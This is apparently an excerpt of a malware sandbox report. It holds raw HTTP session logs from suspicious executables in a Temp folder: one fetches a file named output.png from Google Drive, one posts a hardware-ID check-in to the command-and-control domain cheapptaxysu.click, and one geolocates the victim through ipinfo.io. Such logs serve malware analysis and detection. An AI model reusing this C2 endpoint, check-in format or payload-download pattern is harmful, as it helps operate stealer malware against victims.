                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC15331OUTData Raw: 0e ea 99 7c 91 ce 23 27 23 e8 2f 6f 4a 4e 98 5a 7e 8a e6 df e0 f3 21 a0 6b af a3 09 67 f8 af 49 0a 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73 7d ec 15 61 10 e2 3d 37 2b 0f 87 f9 41 af 35 93 26 3e ec 49 81 45 1d 3f 51 25 59 b3 7d 15 dc f7 92 41 4e bb c9
                                                                                                                                                                                                                                                              Data Ascii: |#'#/oJNZ~!kgI:KoNfB|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s}a=7+A5&>IE?Q%Y}AN
                                                                                                                                                                                                                                                              2024-12-22 01:16:56 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:56 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=8d817lnpaumet3q4kvn8o7hn2n; expires=Wed, 16 Apr 2025 19:03:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TYkc3HdumqBFqGnzhfJG7CiIaY0brtAzUDxXMkvnpHQ2C8q7fy6UVuqIUU5IpbzlSkk9AxqDp7ltYdT%2FVMX7ZAZyxZMQ780ublD%2BlIDEIX3YvrwX6em2teCwdgWvbcdk3UHS%2BIo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44e6da128cc0-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2014&rtt_var=778&sent=300&recv=573&lost=0&retrans=0&sent_bytes=2843&recv_bytes=551991&delivery_rate=1385199&cwnd=222&unsent_bytes=0&cid=e5444e4a495c1f78&ts=2385&x=0"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              18192.168.2.449884142.250.181.654434628C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:54 UTC192OUTGET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: FileDownloader
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC4919INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              X-GUploader-UploadID: AFiumC6QTnk-l6NKHOxp1NrGu8hQJBFQ7ONxvo8zYB1bBEiJvmKd58KlIqhlvo7vGGvbkOvCVtIKux8
                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Content-Length: 156917
                                                                                                                                                                                                                                                              Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:57 GMT
                                                                                                                                                                                                                                                              Expires: Sun, 22 Dec 2024 01:16:57 GMT
                                                                                                                                                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                                                                                                                                                              X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC4919INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92
                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRpIDATx|e3D dw6SY[#*Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#*%XCTE6g0q=d>e[-R,$)YN<2'$
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC4861INData Raw: aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2 bb 10 1f aa
                                                                                                                                                                                                                                                              Data Ascii: L%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC1321INData Raw: e9 76 bb 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0
                                                                                                                                                                                                                                                              Data Ascii: vSQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC1390INData Raw: 67 56 bc b8 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a
                                                                                                                                                                                                                                                              Data Ascii: gVd1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC1390INData Raw: e6 af 62 3d fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe
                                                                                                                                                                                                                                                              Data Ascii: b=v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC1390INData Raw: 09 83 f8 29 d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38
                                                                                                                                                                                                                                                              Data Ascii: )f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC1390INData Raw: 4c 63 e6 8b 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0
                                                                                                                                                                                                                                                              Data Ascii: Lc]a!]x*3qNJl4/^"{f:`(<213g*Wfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8|Ezqr=NKlnqP2z@2d3LJA|a:Fh!+h(p?a&Y`_x-a
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC1390INData Raw: 71 c6 2d df 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17
                                                                                                                                                                                                                                                              Data Ascii: q-6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC1390INData Raw: d9 00 45 39 d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31
                                                                                                                                                                                                                                                              Data Ascii: E9sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--|I<gR|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC1390INData Raw: d3 d0 c5 96 ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12
                                                                                                                                                                                                                                                              Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?|^x;cxM[]%8#pq3!gQv;ezF;_G3


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              19192.168.2.449897104.21.67.1464435040C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:57 UTC355OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=Y0MnBaVocaknWr71LkrwO587RjHDDvDl2Mw1arBBHbQ-1734830196-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 85
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:57 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=CZJvss--geopoxid&j=&hwid=F14195A540BC0B98AC8923850305D13E
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:58 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=6jmu3hd4gjhrhecf175oqm6l8j; expires=Wed, 16 Apr 2025 19:03:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dsdsgcSIVwFzh9ief%2B%2Fi3U4CNqE2tXjNX1F8hYBrZ49AP9p4WXDF3Ka%2BfS34sGxxG7xdCXOxQmVzAZiQcTbdpnLevgI6500hiIlsrLzuxTsOEMDDZdGIs0PqMjOeAowiaWhCjnU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44fe58574255-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=1587&rtt_var=1458&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1076&delivery_rate=579365&cwnd=225&unsent_bytes=0&cid=55ac10eb57e42c36&ts=770&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC54INData Raw: 33 30 0d 0a 69 57 72 35 54 39 49 50 70 69 47 47 53 74 75 59 4a 70 4c 74 73 51 47 58 39 36 6d 4d 36 66 4c 55 7a 62 64 73 75 6f 34 33 52 62 33 53 4e 77 3d 3d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 30iWr5T9IPpiGGStuYJpLtsQGX96mM6fLUzbdsuo43Rb3SNw==
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              20192.168.2.44989934.117.59.814432212C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: IPInfoFetcher
                                                                                                                                                                                                                                                              Host: ipinfo.io
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                              Content-Length: 321
                                                                                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                              date: Sun, 22 Dec 2024 01:16:58 GMT
                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                                                                                                              strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-22 01:16:58 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
